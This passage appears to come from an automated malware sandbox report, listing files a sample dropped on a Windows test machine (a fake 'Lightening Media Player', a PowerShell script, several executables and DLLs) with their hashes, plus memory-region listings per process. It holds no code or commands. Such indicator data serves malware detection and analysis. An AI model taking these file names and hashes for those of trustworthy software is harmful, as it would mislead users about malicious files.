                                                                          309d0f30bebac97e6fbc270f6186082f430d6231

                                                                          SHA256

                                                                          afdd9a253a5a96702951c7d00089ae04eb1eb9933699abf097a7d751e34fddee

                                                                          SHA512

                                                                          d66dcba0d16964abf7097b1ab25323025493f49b1da7031c359ab087ca9bca2a6b6f2901b9491c2d7a52f37958fc6f522e143ce950d024628156db002810af19

                                                                        • C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1
                                                                          MD5

                                                                          86cf9e992d910813213ef33abd88dfab

                                                                          SHA1

                                                                          adfefcdd811ee62c7327519d024ed6f38bc42f08

                                                                          SHA256

                                                                          c7ffcca83f69ea19393694240650fe2e4041e681956bef2becf4aefda12b4a0d

                                                                          SHA512

                                                                          9ab188c4e944514c8589a557e477be285fb28d0351796805a131016f4448444fb8a55cbb61dea0c3b6526e7b8f957caee8d199eade9a2f221392b0775f6f66f9

                                                                        • C:\Users\Admin\AppData\Local\Temp\oootqhsx.vcv\SunLabsPlayer.exe
                                                                          MD5

                                                                          6eed4f285c033719f8c0ff2d3906d87a

                                                                          SHA1

                                                                          34050a77c5ad98580563f6b38481dc2ae63af6de

                                                                          SHA256

                                                                          3fa1eef0a71f3e8da97f09c0867efae890228571d2d976c31881e64ab33e8ea8

                                                                          SHA512

                                                                          0d66a730d12a6e52263deae3be5ae54b305aea99e9ee6350032be40dc6745dc8f3d49da4dc5eae0f0d32025ad0898c89fe02ecf87a5ad044c9e121dba1555dee

                                                                        • C:\Users\Admin\AppData\Local\Temp\oootqhsx.vcv\SunLabsPlayer.exe
                                                                          MD5

                                                                          6eed4f285c033719f8c0ff2d3906d87a

                                                                          SHA1

                                                                          34050a77c5ad98580563f6b38481dc2ae63af6de

                                                                          SHA256

                                                                          3fa1eef0a71f3e8da97f09c0867efae890228571d2d976c31881e64ab33e8ea8

                                                                          SHA512

                                                                          0d66a730d12a6e52263deae3be5ae54b305aea99e9ee6350032be40dc6745dc8f3d49da4dc5eae0f0d32025ad0898c89fe02ecf87a5ad044c9e121dba1555dee

                                                                        • C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe
                                                                          MD5

                                                                          fe30524bb4883a106d7144747e02d2f7

                                                                          SHA1

                                                                          4a9c00b6c8279b464aba0b1f5ac7590dd163a087

                                                                          SHA256

                                                                          b5c365f494644d5615c572ed52d83a75642e09fbc9eb9aabdcfc529b825bc8ba

                                                                          SHA512

                                                                          51eebafd5f9075b559ef09c62e46fc2a9923fd37c675ae7cc9fa0204b729eb7329c33011313608f226199e2239651f233c146d84dbafee8d08962be540d73d1f

                                                                        • C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe
                                                                          MD5

                                                                          fe30524bb4883a106d7144747e02d2f7

                                                                          SHA1

                                                                          4a9c00b6c8279b464aba0b1f5ac7590dd163a087

                                                                          SHA256

                                                                          b5c365f494644d5615c572ed52d83a75642e09fbc9eb9aabdcfc529b825bc8ba

                                                                          SHA512

                                                                          51eebafd5f9075b559ef09c62e46fc2a9923fd37c675ae7cc9fa0204b729eb7329c33011313608f226199e2239651f233c146d84dbafee8d08962be540d73d1f

                                                                        • C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe
                                                                          MD5

                                                                          fe30524bb4883a106d7144747e02d2f7

                                                                          SHA1

                                                                          4a9c00b6c8279b464aba0b1f5ac7590dd163a087

                                                                          SHA256

                                                                          b5c365f494644d5615c572ed52d83a75642e09fbc9eb9aabdcfc529b825bc8ba

                                                                          SHA512

                                                                          51eebafd5f9075b559ef09c62e46fc2a9923fd37c675ae7cc9fa0204b729eb7329c33011313608f226199e2239651f233c146d84dbafee8d08962be540d73d1f

                                                                        • C:\Users\Admin\AppData\Local\Temp\xvfehce5.jnu\md1_1eaf.exe
                                                                          MD5

                                                                          25d9f83dc738b4894cf159c6a9754e40

                                                                          SHA1

                                                                          152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                          SHA256

                                                                          8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                          SHA512

                                                                          41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                        • C:\Users\Admin\AppData\Local\Temp\xvfehce5.jnu\md1_1eaf.exe
                                                                          MD5

                                                                          25d9f83dc738b4894cf159c6a9754e40

                                                                          SHA1

                                                                          152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                          SHA256

                                                                          8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                          SHA512

                                                                          41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                        • C:\Users\Admin\AppData\Roaming\1619192216446.exe
                                                                          MD5

                                                                          ef6f72358cb02551caebe720fbc55f95

                                                                          SHA1

                                                                          b5ee276e8d479c270eceb497606bd44ee09ff4b8

                                                                          SHA256

                                                                          6562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5

                                                                          SHA512

                                                                          ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90

                                                                        • C:\Users\Admin\AppData\Roaming\1619192216446.exe
                                                                          MD5

                                                                          ef6f72358cb02551caebe720fbc55f95

                                                                          SHA1

                                                                          b5ee276e8d479c270eceb497606bd44ee09ff4b8

                                                                          SHA256

                                                                          6562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5

                                                                          SHA512

                                                                          ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90

                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
                                                                          MD5

                                                                          cb5747870fed9da28821c27791522090

                                                                          SHA1

                                                                          9f3653ecb1511ba1b4b5f7ed10946f91e11aa328

                                                                          SHA256

                                                                          30fb4984c5caf62ba3db6fbad714014c7450b99701c4a204c6030a3733efef86

                                                                          SHA512

                                                                          8a4739afcc57b1d1574e8a51f39fa535ea1ecd8f65953e72184993a109f558ab970ae4c121961e09b2997071022c27ae5b0d0cfafaedf2ed862ca5f47bdec1d5

                                                                        • C:\Users\Admin\Desktop\Lightening Media Player.lnk
                                                                          MD5

                                                                          daa4b6fa2cdc4b24175bad5eaa715d14

                                                                          SHA1

                                                                          538b353d72d633e2222608d6fa893bb47cbcfafb

                                                                          SHA256

                                                                          ced252e747d7c8418b76b1f23224c7603013a48b84d5f10dbd8062388edba9bf

                                                                          SHA512

                                                                          531d8b06f1c979e8700479f0e6389c7869af90377f3f615cc5d4b35fbd184356c69fd2153b64ef3dc0f085e3a9c76e6f7e0498bcab141535297208775b82a107

                                                                        • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                                          MD5

                                                                          f964811b68f9f1487c2b41e1aef576ce

                                                                          SHA1

                                                                          b423959793f14b1416bc3b7051bed58a1034025f

                                                                          SHA256

                                                                          83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                                          SHA512

                                                                          565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                                        • \Users\Admin\AppData\Local\Temp\AE30.tmp
                                                                          MD5

                                                                          50741b3f2d7debf5d2bed63d88404029

                                                                          SHA1

                                                                          56210388a627b926162b36967045be06ffb1aad3

                                                                          SHA256

                                                                          f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                          SHA512

                                                                          fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                        • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                          MD5

                                                                          50741b3f2d7debf5d2bed63d88404029

                                                                          SHA1

                                                                          56210388a627b926162b36967045be06ffb1aad3

                                                                          SHA256

                                                                          f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                          SHA512

                                                                          fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                        • \Users\Admin\AppData\Local\Temp\is-95I0P.tmp\idp.dll
                                                                          MD5

                                                                          8f995688085bced38ba7795f60a5e1d3

                                                                          SHA1

                                                                          5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                          SHA256

                                                                          203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                          SHA512

                                                                          043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\Dialer.dll
                                                                          MD5

                                                                          7eb8a5c6ee1e134473eef694b05cfab7

                                                                          SHA1

                                                                          8bf3eb9030d369739147dfede07e913bda041584

                                                                          SHA256

                                                                          78199ba6a820f2f7d0429c636ac9a7bcc58ef9ced468549c7608c684e0dc99a4

                                                                          SHA512

                                                                          152fd07baf404e035f086d865225b50d5c845346cecbf1f89c1b38cf03b93cd9377b6513545a4936caec496a09bc855fcc8e74f36524fe7d9a719fd715a3b562

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\System.dll
                                                                          MD5

                                                                          2e025e2cee2953cce0160c3cd2e1a64e

                                                                          SHA1

                                                                          dec3da040ea72d63528240598bf14f344efb2a76

                                                                          SHA256

                                                                          d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                                          SHA512

                                                                          3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\nsExec.dll
                                                                          MD5

                                                                          1139fb5cc942e668c8277f8b8f1e5f20

                                                                          SHA1

                                                                          94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                          SHA256

                                                                          9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                          SHA512

                                                                          08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\nsExec.dll
                                                                          MD5

                                                                          1139fb5cc942e668c8277f8b8f1e5f20

                                                                          SHA1

                                                                          94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                          SHA256

                                                                          9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                          SHA512

                                                                          08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\nsExec.dll
                                                                          MD5

                                                                          1139fb5cc942e668c8277f8b8f1e5f20

                                                                          SHA1

                                                                          94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                          SHA256

                                                                          9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                          SHA512

                                                                          08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\nsExec.dll
                                                                          MD5

                                                                          1139fb5cc942e668c8277f8b8f1e5f20

                                                                          SHA1

                                                                          94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                          SHA256

                                                                          9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                          SHA512

                                                                          08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                        • \Users\Admin\AppData\Local\Temp\nsg5556.tmp\nsExec.dll
                                                                          MD5

                                                                          1139fb5cc942e668c8277f8b8f1e5f20

                                                                          SHA1

                                                                          94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                          SHA256

                                                                          9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                          SHA512

                                                                          08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                        • memory/672-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                          Filesize

                                                                          172KB

                                                                        • memory/696-310-0x0000000007243000-0x0000000007244000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/696-308-0x0000000007242000-0x0000000007243000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/696-305-0x0000000000000000-mapping.dmp
                                                                        • memory/696-307-0x0000000007240000-0x0000000007241000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/816-332-0x0000000000000000-mapping.dmp
                                                                        • memory/1156-178-0x0000000000402F68-mapping.dmp
                                                                        • memory/1156-177-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                          Filesize

                                                                          48KB

                                                                        • memory/1564-124-0x0000000000000000-mapping.dmp
                                                                        • memory/1564-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                          Filesize

                                                                          88KB

                                                                        • memory/2116-136-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/2116-128-0x0000000000000000-mapping.dmp
                                                                        • memory/2236-150-0x00000000029C5000-0x00000000029C7000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2236-138-0x0000000000000000-mapping.dmp
                                                                        • memory/2236-148-0x00000000029C2000-0x00000000029C4000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2236-145-0x00000000029C0000-0x00000000029C2000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2236-149-0x00000000029C4000-0x00000000029C5000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/2260-350-0x0000000000000000-mapping.dmp
                                                                        • memory/2576-146-0x0000000002DD0000-0x0000000002DD2000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2576-147-0x0000000002DD2000-0x0000000002DD4000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/2576-141-0x0000000000000000-mapping.dmp
                                                                        • memory/2576-151-0x0000000002DD5000-0x0000000002DD6000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/2712-192-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                          Filesize

                                                                          40.0MB

                                                                        • memory/2712-169-0x0000000000000000-mapping.dmp
                                                                        • memory/2712-191-0x0000000004830000-0x00000000048C1000-memory.dmp
                                                                          Filesize

                                                                          580KB

                                                                        • memory/2760-366-0x0000000000000000-mapping.dmp
                                                                        • memory/3052-198-0x0000000002630000-0x0000000002647000-memory.dmp
                                                                          Filesize

                                                                          92KB

                                                                        • memory/3052-224-0x00000000025A0000-0x00000000025B5000-memory.dmp
                                                                          Filesize

                                                                          84KB

                                                                        • memory/3116-274-0x0000000000000000-mapping.dmp
                                                                        • memory/3580-123-0x0000000000CE0000-0x0000000000CE2000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/3580-120-0x0000000000000000-mapping.dmp
                                                                        • memory/3936-116-0x0000000000000000-mapping.dmp
                                                                        • memory/3936-118-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4032-132-0x0000000000000000-mapping.dmp
                                                                        • memory/4032-137-0x00000000016C0000-0x00000000016C2000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/4104-164-0x0000000000000000-mapping.dmp
                                                                        • memory/4104-226-0x00000000037F0000-0x0000000003800000-memory.dmp
                                                                          Filesize

                                                                          64KB

                                                                        • memory/4104-232-0x0000000003A30000-0x0000000003A40000-memory.dmp
                                                                          Filesize

                                                                          64KB

                                                                        • memory/4216-355-0x0000000000000000-mapping.dmp
                                                                        • memory/4288-161-0x0000000000000000-mapping.dmp
                                                                        • memory/4328-190-0x0000000000000000-mapping.dmp
                                                                        • memory/4428-172-0x0000000000000000-mapping.dmp
                                                                        • memory/4484-153-0x0000000000000000-mapping.dmp
                                                                        • memory/4488-223-0x0000000007E10000-0x0000000007E11000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-218-0x00000000076D0000-0x00000000076D1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-239-0x00000000083B0000-0x00000000083B1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-240-0x0000000008810000-0x0000000008811000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-225-0x0000000008060000-0x0000000008061000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-222-0x0000000007FF0000-0x0000000007FF1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-297-0x0000000007093000-0x0000000007094000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-221-0x0000000007D70000-0x0000000007D71000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-220-0x0000000007092000-0x0000000007093000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-219-0x0000000007090000-0x0000000007091000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-211-0x0000000000000000-mapping.dmp
                                                                        • memory/4488-286-0x000000000AB70000-0x000000000AB71000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-238-0x0000000007FA0000-0x0000000007FA1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-279-0x0000000009FF0000-0x0000000009FF1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-270-0x00000000099B0000-0x00000000099B1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-278-0x00000000096C0000-0x00000000096C1000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-277-0x0000000009670000-0x0000000009671000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4488-217-0x0000000007050000-0x0000000007051000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4512-199-0x0000000000000000-mapping.dmp
                                                                        • memory/4524-214-0x0000000000400000-0x00000000041D7000-memory.dmp
                                                                          Filesize

                                                                          61.8MB

                                                                        • memory/4524-205-0x0000000000000000-mapping.dmp
                                                                        • memory/4524-213-0x0000000004A80000-0x000000000538A000-memory.dmp
                                                                          Filesize

                                                                          9.0MB

                                                                        • memory/4568-280-0x0000000000000000-mapping.dmp
                                                                        • memory/4568-188-0x0000000000000000-mapping.dmp
                                                                        • memory/4604-360-0x0000000000000000-mapping.dmp
                                                                        • memory/4612-363-0x0000000000000000-mapping.dmp
                                                                        • memory/4624-168-0x0000000000000000-mapping.dmp
                                                                        • memory/4632-183-0x0000000000000000-mapping.dmp
                                                                        • memory/4660-329-0x0000000004A33000-0x0000000004A34000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4660-327-0x0000000004A32000-0x0000000004A33000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4660-326-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4660-324-0x0000000000000000-mapping.dmp
                                                                        • memory/4696-209-0x0000000000400000-0x0000000003DAF000-memory.dmp
                                                                          Filesize

                                                                          57.7MB

                                                                        • memory/4696-200-0x0000000000000000-mapping.dmp
                                                                        • memory/4696-208-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                          Filesize

                                                                          36KB

                                                                        • memory/4792-321-0x0000000006930000-0x0000000006931000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4792-322-0x0000000006932000-0x0000000006933000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4792-325-0x0000000006933000-0x0000000006934000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/4792-318-0x0000000000000000-mapping.dmp
                                                                        • memory/4836-160-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                          Filesize

                                                                          1.3MB

                                                                        • memory/4836-159-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                          Filesize

                                                                          64KB

                                                                        • memory/4836-154-0x0000000000000000-mapping.dmp
                                                                        • memory/4840-176-0x0000000000030000-0x000000000003C000-memory.dmp
                                                                          Filesize

                                                                          48KB

                                                                        • memory/4840-173-0x0000000000000000-mapping.dmp
                                                                        • memory/4904-181-0x0000000000000000-mapping.dmp
                                                                        • memory/4956-163-0x0000000000000000-mapping.dmp
                                                                        • memory/4956-157-0x0000000000000000-mapping.dmp
                                                                        • memory/4968-184-0x0000000000000000-mapping.dmp
                                                                        • memory/5000-196-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                          Filesize

                                                                          64KB

                                                                        • memory/5000-193-0x0000000000000000-mapping.dmp
                                                                        • memory/5000-197-0x0000000000550000-0x000000000069A000-memory.dmp
                                                                          Filesize

                                                                          1.3MB

                                                                        • memory/5036-298-0x0000000003120000-0x0000000003121000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5036-290-0x0000000000000000-mapping.dmp
                                                                        • memory/5036-299-0x0000000003122000-0x0000000003123000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5036-303-0x0000000003123000-0x0000000003124000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5072-364-0x0000000000000000-mapping.dmp
                                                                        • memory/5108-354-0x0000000003330000-0x000000000339B000-memory.dmp
                                                                          Filesize

                                                                          428KB

                                                                        • memory/5108-351-0x0000000000000000-mapping.dmp
                                                                        • memory/5108-353-0x0000000003600000-0x0000000003674000-memory.dmp
                                                                          Filesize

                                                                          464KB

                                                                        • memory/5188-347-0x0000000000400000-0x0000000002BBC000-memory.dmp
                                                                          Filesize

                                                                          39.7MB

                                                                        • memory/5188-343-0x0000000002BC0000-0x0000000002D0A000-memory.dmp
                                                                          Filesize

                                                                          1.3MB

                                                                        • memory/5188-334-0x0000000000000000-mapping.dmp
                                                                        • memory/5228-319-0x0000000004F23000-0x0000000004F24000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5228-314-0x0000000004F20000-0x0000000004F21000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5228-315-0x0000000004F22000-0x0000000004F23000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5228-312-0x0000000000000000-mapping.dmp
                                                                        • memory/5244-368-0x0000000000000000-mapping.dmp
                                                                        • memory/5256-330-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5256-333-0x0000000004C23000-0x0000000004C24000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5256-331-0x0000000004C22000-0x0000000004C23000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5256-328-0x0000000000000000-mapping.dmp
                                                                        • memory/5400-336-0x0000000003E00000-0x0000000003F4A000-memory.dmp
                                                                          Filesize

                                                                          1.3MB

                                                                        • memory/5400-337-0x0000000000400000-0x0000000003DF6000-memory.dmp
                                                                          Filesize

                                                                          58.0MB

                                                                        • memory/5400-335-0x0000000000000000-mapping.dmp
                                                                        • memory/5444-271-0x0000000010000000-0x0000000010116000-memory.dmp
                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/5444-257-0x0000000000000000-mapping.dmp
                                                                        • memory/5464-369-0x0000000000000000-mapping.dmp
                                                                        • memory/5480-359-0x0000000000000000-mapping.dmp
                                                                        • memory/5540-260-0x0000000000000000-mapping.dmp
                                                                        • memory/5540-265-0x0000000000400000-0x00000000041D7000-memory.dmp
                                                                          Filesize

                                                                          61.8MB

                                                                        • memory/5560-362-0x0000000000000000-mapping.dmp
                                                                        • memory/5612-365-0x0000000000000000-mapping.dmp
                                                                        • memory/5620-361-0x0000000000000000-mapping.dmp
                                                                        • memory/5744-348-0x0000000004070000-0x0000000004101000-memory.dmp
                                                                          Filesize

                                                                          580KB

                                                                        • memory/5744-341-0x0000000000000000-mapping.dmp
                                                                        • memory/5744-349-0x0000000000400000-0x0000000003DF6000-memory.dmp
                                                                          Filesize

                                                                          58.0MB

                                                                        • memory/5772-367-0x0000000000000000-mapping.dmp
                                                                        • memory/5832-346-0x0000000008523000-0x0000000008524000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5832-340-0x0000000000400000-0x0000000003DC9000-memory.dmp
                                                                          Filesize

                                                                          57.8MB

                                                                        • memory/5832-338-0x0000000000000000-mapping.dmp
                                                                        • memory/5832-339-0x00000000001D0000-0x0000000000200000-memory.dmp
                                                                          Filesize

                                                                          192KB

                                                                        • memory/5832-345-0x0000000008522000-0x0000000008523000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5832-342-0x0000000008524000-0x0000000008526000-memory.dmp
                                                                          Filesize

                                                                          8KB

                                                                        • memory/5832-344-0x0000000008520000-0x0000000008521000-memory.dmp
                                                                          Filesize

                                                                          4KB

                                                                        • memory/5852-266-0x0000000000000000-mapping.dmp
                                                                        • memory/5940-267-0x0000000000000000-mapping.dmp
                                                                        • memory/5964-352-0x0000000000000000-mapping.dmp
                                                                        • memory/6012-281-0x0000000000000000-mapping.dmp
                                                                        • memory/6036-356-0x0000000000000000-mapping.dmp
                                                                        • memory/6040-357-0x0000000000000000-mapping.dmp
                                                                        • memory/6132-358-0x0000000000000000-mapping.dmp